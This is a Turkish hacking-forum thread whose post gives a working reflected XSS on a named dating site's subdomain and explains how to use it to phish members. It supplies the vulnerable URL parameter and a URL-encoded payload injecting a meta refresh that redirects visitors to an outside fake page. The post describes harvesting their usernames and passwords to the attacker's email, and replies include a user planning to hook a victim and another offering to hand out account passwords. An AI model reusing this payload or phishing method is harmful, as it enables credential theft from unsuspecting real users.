

Gayet.Net - XSS |- | Sub. Ekolay.Net | Üyeleri Oltaya Getirmek - Phishing | Credit : Swool
-
Garantiarkadas.com XSS | Üyeleri Oltaya Getirmek - Phishing | Credit : Swool
http://www.tahribat.com/forumdisplayfolder.asp?folderid=58056
NOT : Her iki siteninde Hacker Safe ile korunuyor olması, sosyal mühendislik ve Phishing saldırılarını engelleyemez. İlk örneğini popüler arkadaşlık sitesi garantiarkadas.com'da gördüğünüz bu yöntemi, ekolay.net bünyesindeki gayet.net'tede entegre edebilirsiniz.
-----------------------------------------------------------------------------------------
Gayet.net - XSS |- | Sub. ekolay.net | Üyeleri Oltaya Getirmek - Phishing | Credit : Swool
- Discussion
sinema sub - Haber.asp? modülündeki açıktan faydalanarak, site ziyaretcilerini sosyal mühendislik zekanızıda kullanarak kendi hazırladığınız fake sayfasına girmesini sağlayabilir, bilgilerin girilmesi durumunda şifre ve kullanıcı adını kendi e-posta adresinize yönlendirebilirsiniz. Link aynı sayfa üzerinden entegre edileceği için, internet ve güvenlik konusunda zatıf birisini oltaya getirmeniz daha kolay olacaktır.
gayet ve sinema aynı domain üzerinden sub aldığı için üyelerin şüphelenmesi söz konusu olmayacaktır.
[Domain] = http://ekolay.net
[Sub] = http://gayet.ekolay.net
[XSS] = %22%3E%3Ch1%3EBy%20Swool%3Cmeta%20http-equiv=%22refresh%22%20content=%221;URL=http://e-innercity.net/gayet.htm%22%3E
[URL] = http://www.ekolay.net/mizah/CategoryGeyikFoto.asp?PID=
Linki C/P ile adres çubuğuna yapıştırın. Direk tıkladığınızda XSS sayfası açılmaz.
-
bütün arkadaşlık sitelerinin xsslerini çözecen galiba buu gidişle heykırım benim :F
-
-
Netlog ısteruk
-
ref codu atarsan bi pm olarak çok makbule geçer hoca arkadaşlıklarla işim yokta birisini oltaya getirecem :)
-
Nury bunu yazdı:
-----------------------------
gayet.net istediginiz uyelik filan varsa soyleyin sifersini vereyim (: yada gold uyelik icin ref. kodu vereyim :P
-----------------------------hani bana hani bana